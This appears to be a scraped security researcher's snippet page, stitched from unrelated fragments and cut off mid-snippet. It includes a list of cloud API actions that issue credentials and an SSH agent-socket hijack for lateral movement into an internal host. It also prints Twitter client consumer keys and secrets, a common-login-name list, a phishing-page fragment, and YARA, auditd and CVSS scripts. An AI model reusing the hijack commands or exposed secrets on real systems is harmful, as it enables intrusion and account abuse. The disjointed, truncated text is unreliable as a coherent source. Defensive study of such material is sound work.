Tim Brown timb-machine

chime:CreateApiKey
codepipeline:PollForJobs
cognito-identity:GetOpenIdToken
cognito-identity:GetOpenIdTokenForDeveloperIdentity
cognito-identity:GetCredentialsForIdentity
connect:GetFederationToken
connect:GetFederationTokens
ecr:GetAuthorizationToken
[gamelift:RequestUploadCredentials](ht

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld

user@internal:~$ hostname -f
internal.company.tld

Twitter Official Consumer Key

Twitter for Android

type:            PIN
Consumer key:    3nVuSoBZnx6U4vzUxf5w
Consumer secret: Bcs59EFbbsdF6Sl9Ng71smgStWEGwXXKSjYvPVt7qys

Twitter for iPhone

type:            PIN

Consumer key: IQKbtAYlXLripLGPWd0HUA

TLDR

Cisco Security Manager is an enterprise-class security management application that provides insight into and control of Cisco security and network devices. Cisco Security Manager offers comprehensive security management (configuration and event management) across a wide range of Cisco security appliances, including Cisco ASA Adaptive Security Appliances, Cisco IPS Series Sensor Appliances, Cisco Integrated Services Routers (ISRs), Cisco Firewall Services Modules (FWSMs), Cisco Catalyst, Cisco Switches and many more. Cisco Security Manager allows you to manage networks of all sizes efficiently-from small networks to large networks consisting of hundreds of devices.

Several pre-auth vulnerabilities were submitted to Cisco on 2020-07-13 and (according to Cisco) patched in version 4.22 on 2020-11-10. Release notes didn't state anything about the vulnerabilities, security advisories were not published. All payload are processed in the context of NT AUTHORITY\SYSTEM.

	rule aix {
	meta:
	author = "Tim Brown @timb_machine"
	description = "AIX binary"
	strings:
	$libca = "libc.a"
	$text = ".text"
	$data = ".data"
	condition:
	$libca and $text and $data

	#!/bin/sh

	generate_file_rule () {
	filepermissions="${1}"
	rulename="${2}"
	while read filename
	do
	printf -- "-w %s -p %s -k %s\n" "${filename}" "${filepermissions}" "${rulename}"
	done
	}

	461 root
	392
	160 admin
	94 default
	39 guest
	24 support
	21 user
	20 1234
	16 password
	15 12345

	// Taken from https://urlscan.io/result/ce20fb52-b4d9-45dd-8034-fb9eae99350e#transactions:
	// Request 1 for loadtxt.php:
	// Blob 2 from response decoded with base64decode.org:

	<!DOCTYPE html>
	<html>
	<head>
	<title></title>
	<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
	</head>

	#!/usr/bin/perl -w

	use strict;
	use Data::Dumper;

	my %killchainmodel;
	my $cvssmetric;
	my $metricname;
	my $metricscore;
	my $phasename;

	Zoom client application chat Giphy arbitrary file write
	https://talosintelligence.com/vulnerability_reports/TALOS-2020-1055
	8.5 - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

	Tims-MacBook-Air:~ timb$ ./cvss-to-kill-chain-phase.pl CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H
	Delivery
	0.6
	Weaponisation
	0.3
	Command & Control